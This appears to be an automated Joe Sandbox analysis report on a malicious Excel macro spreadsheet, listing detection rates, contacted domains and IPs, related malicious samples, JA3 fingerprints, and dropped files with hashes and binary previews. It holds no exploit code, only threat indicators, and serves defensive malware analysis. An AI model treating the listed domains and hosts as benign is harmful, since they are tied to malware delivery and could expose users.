    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    statistic-2067311372.xlsm6%VirustotalBrowse
    statistic-2067311372.xlsm21%MetadefenderBrowse
    statistic-2067311372.xlsm55%ReversingLabsWin32.Trojan.Ditertag

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    anaheimdermatologists.com3%VirustotalBrowse
    industrialarttextile.com0%VirustotalBrowse

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    anaheimdermatologists.com
    192.185.5.2
    truefalseunknown
    industrialarttextile.com
    192.254.233.89
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4jordji.nbvt11.0.drfalse
      high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      192.185.5.2
      anaheimdermatologists.comUnited States
      46606UNIFIEDLAYER-AS-1USfalse
      192.254.233.89
      industrialarttextile.comUnited States
      46606UNIFIEDLAYER-AS-1USfalse

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:403886
      Start date:04.05.2021
      Start time:13:55:50
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 23s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:statistic-2067311372.xlsm
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Run name:Potential for more IOCs and behavior
      Number of analysed new started processes analysed:15
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.expl.evad.winXLSM@5/13@2/2
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsm
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 13.88.21.125, 104.43.193.48, 184.30.24.56, 93.184.221.240
      • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
      • Report size getting too big, too many NtOpenFile calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      192.185.5.2statistic-2069354685.xlsmGet hashmaliciousBrowse
        statistic-2067311372.xlsmGet hashmaliciousBrowse
          statistic-2070252624.xlsmGet hashmaliciousBrowse
            statistic-2069354685.xlsmGet hashmaliciousBrowse
              statistic-2070252624.xlsmGet hashmaliciousBrowse
                statistic-2072807337.xlsmGet hashmaliciousBrowse
                  statistic-207394368.xlsmGet hashmaliciousBrowse
                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                      statistic-207394368.xlsmGet hashmaliciousBrowse
                        catalog-1521295750.xlsmGet hashmaliciousBrowse
                          catalog-1521295750.xlsmGet hashmaliciousBrowse
                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                f.xlsmGet hashmaliciousBrowse
                                  f.xlsmGet hashmaliciousBrowse
                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                        14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                            diagram-1732659868.xlsmGet hashmaliciousBrowse
                                              192.254.233.89statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                  statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                        statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                          statistic-207394368.xlsmGet hashmaliciousBrowse
                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                  statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                        14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            industrialarttextile.comstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            anaheimdermatologists.comstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                            • 192.185.5.2

                                                                            ASN

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            UNIFIEDLAYER-AS-1USstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                            • 162.241.169.22
                                                                            ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                            • 192.254.185.244
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            presentation.jarGet hashmaliciousBrowse
                                                                            • 50.87.249.219
                                                                            presentation.jarGet hashmaliciousBrowse
                                                                            • 50.87.249.219
                                                                            GK58.vbsGet hashmaliciousBrowse
                                                                            • 192.185.21.136
                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.20.98
                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.20.98
                                                                            4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                            • 50.87.166.59
                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 108.179.242.122
                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 108.179.242.122
                                                                            6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                            • 162.241.24.47
                                                                            UNIFIEDLAYER-AS-1USstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                            • 162.241.169.22
                                                                            ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                            • 192.254.185.244
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.254.233.89
                                                                            presentation.jarGet hashmaliciousBrowse
                                                                            • 50.87.249.219
                                                                            presentation.jarGet hashmaliciousBrowse
                                                                            • 50.87.249.219
                                                                            GK58.vbsGet hashmaliciousBrowse
                                                                            • 192.185.21.136
                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.20.98
                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.20.98
                                                                            4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                            • 50.87.166.59
                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 108.179.242.122
                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 108.179.242.122
                                                                            6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                            • 162.241.24.47

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            37f463bf4616ecd445d4a1937da06e19statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            f97e137e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            MV RED SEA.docxGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            IMG-WA7905432.exeGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            Tree Top.htmlGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            PT6-1152.docGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            s.dllGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            setup-lightshot.exeGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            s.dllGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89
                                                                            8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                            • 192.185.5.2
                                                                            • 192.254.233.89

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4A881418.png
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):34787
                                                                            Entropy (8bit):7.9883689087667955
                                                                            Encrypted:false
                                                                            SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                            MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                            SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                            SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                            SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\87BF5DB3.png
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):8301
                                                                            Entropy (8bit):7.970711494690041
                                                                            Encrypted:false
                                                                            SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                            MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                            SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                            SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                            SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A86749E6.png
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):848
                                                                            Entropy (8bit):7.595467031611744
                                                                            Encrypted:false
                                                                            SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                            MD5:02DB1068B56D3FD907241C2F3240F849
                                                                            SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                            SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                            SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F7429539.png
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):557
                                                                            Entropy (8bit):7.343009301479381
                                                                            Encrypted:false
                                                                            SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                            MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                            SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                            SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                            SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\suspendedpage[1].htm
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:HTML document, ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):494
                                                                            Entropy (8bit):4.962239405540505
                                                                            Encrypted:false
                                                                            SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                                                            MD5:0357AA49EA850B11B99D09A2479C321B
                                                                            SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                                                            SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                                                            SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                                                            Malicious:false
                                                                            IE Cache URL:https://anaheimdermatologists.com/cgi-sys/suspendedpage.cgi
                                                                            Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.
                                                                            C:\Users\user\AppData\Local\Temp\79C10000
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):107618
                                                                            Entropy (8bit):7.9160914017595605
                                                                            Encrypted:false
                                                                            SSDEEP:1536:nmHTqPyl/yBO992hjPcQpWUot9ErjPX44sh0x13TQfDO:nl+yo9opH8x+3xs6ZQq
                                                                            MD5:46B9E48683C9667EA5A7D7F317C99F5C
                                                                            SHA1:FAF81A578491D60CBFB75ACF38642109F13C6B6B
                                                                            SHA-256:D358F70D718306136A9D3398CD799D4A21657B13ED7A4C6C9A67190E60251145
                                                                            SHA-512:950D5193701D5D3AF3B09D9F24DBA1D33330371A732624D53884BD439A0B3A0375A0CA590A86444207FA30A507D3A478EF192280EE1A1EF18CB4D3C64926240E
                                                                            Malicious:false
                                                                            Preview: .U.N.0.}G..".....j..]xd.`?....U..1.....P.*-.....s.3.^....!...e..U.W.u-.w.].d.&.0.A...rvz2._.......O)...e.V`..8.,|.".k.x.r):.......K.R.2..M..B<.T].hy.d...~o..T-.!.-E"...w$._,....%..C....H.4!jb.w.........{.m..wgD08N..CC....u.32......!./50j....FXr.....q9.~....fZ.a%.4.......s....=+..T2....'(.n.......:..A.u.|Z.....2.n<.h.U]..........>...6bZ..o.2..C............>.CE.%...x...}.4+o..H.8.x..'Y...AL...l..2.,?.....j.7/...?.......PK..........!.t...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 19:05:17 2019, mtime=Tue May 4 19:56:50 2021, atime=Tue May 4 19:56:50 2021, length=8192, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):920
                                                                            Entropy (8bit):4.680611183602681
                                                                            Encrypted:false
                                                                            SSDEEP:12:8JON3sDUseCHqqGbkXe5zVudd+WMEjAt/rbD5b1e0b1eZ44t2Y+xIBjKZm:8Ja+MAGQAtvDUw7aB6m
                                                                            MD5:C59873FB616B8D27B8BECC7F4927E717
                                                                            SHA1:0A70778AC5D3F7EC347D906013C628A4318B1EC1
                                                                            SHA-256:39A425E72DBDE9E94F89F326B3F105B4FC90ED3A397C8AD7CC1DD3D1547ACC6F
                                                                            SHA-512:9A655D9C4DBA56323117590601DAC852A4ECE30A37930D9815401F156EC275C058C27A129AAD0AF19F80717C962135523F6EE4F56D98309AD1B74A0F790F3337
                                                                            Malicious:false
                                                                            Preview: L..................F........)...#-...ND.(A..o.A.(A... ...........................P.O. .:i.....+00.../C:\...................x.1......N...Users.d......L...R......................:.......1.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....\.1.....>Q.{..user~1..D.......N...R.......S........................f.r.o.n.t.d.e.s.k.....~.1......R....Desktop.h.......N...R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......I...............-.......H...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...A....`.......X.......562258...........!a..%.H.VZAj...8T...............!a..%.H.VZAj...8T..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):126
                                                                            Entropy (8bit):4.653341881725958
                                                                            Encrypted:false
